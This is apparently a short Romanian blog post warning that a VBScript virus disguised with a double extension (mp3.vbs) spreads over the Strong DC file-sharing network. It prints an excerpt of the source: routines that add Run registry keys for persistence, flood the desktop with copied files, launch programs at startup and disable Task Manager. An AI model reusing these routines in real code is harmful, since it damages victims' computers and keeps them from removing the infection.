Intrat pe Strong dc ca sa vad ce mai copiaza lumea... pe primul loc detasat ramane Porno am gasit o chestie interesanta... un nou virus care circula pe Strong dc.
Daca veti observa extentie dubla de felul mp3.vbs sa nu rulati pentru ca este un cirus frumusel care se autocopaiza in startup,iti blocheaza accesul la Task manager si multe altele.
Si o mica parte din codul sursa .
function StrtEachStartup(KeyName,KeyVal)
on error resume next
wscr.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"&KeyName,KeyVal
wscr.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\"&KeyName,KeyVal
end function
sub ShowMessage ()
on error resume next
mylogo=" /\ /\" & vbcrlf &_
" // /| |\ \\" & vbcrlf&_
" // || || \\" & vbcrlf&_
" (////||X|||\\\\)" & vbcrlf&_
" || ||" & vbcrlf&_
" \| |/ " & vbcrlf & vbcrlf
msgbox "kernel32.dll @"&vbcrlf&"SET NEW fs.kernel:=[Lido44.dll] ;) "&vbcrlf&"Kernel44.dll : Sandwich based" _
& vbcrlf & vbcrlf & mylogo& " -= THE MAD KERNEL =-",28,"WinZaws explorer [KERNEL32.DLL]"
end sub
sub ADDfilesToDesktop()
on error resume next
rr = wscr.regread("HKEY_CURRENT_USER\Software\Microsoft\"&_
"Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
for i=1 to 99
set c=fso.GetFile(sys32dir&"\"&HTMLname)
htmxfiles="\message_sandwich{"& hex(int(timer+date+i)) &"}.htm"
c.copy (rr & htmxfiles )
next
end sub
sub OpenManyApps()
on error resume next
for i=1 to 12
StrtEachStartup "l44sys"&i,"freecell"
StrtEachStartup "l44sys"&i+32,"winmine"
StrtEachStartup "l44sys"&i+64,"iexplore"
next
end sub
on error resume next
sub DisableCtrAlrSupp()
on error resume next
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
end sub
0 Comments:
Subscribe to:
Postare comentarii (Atom)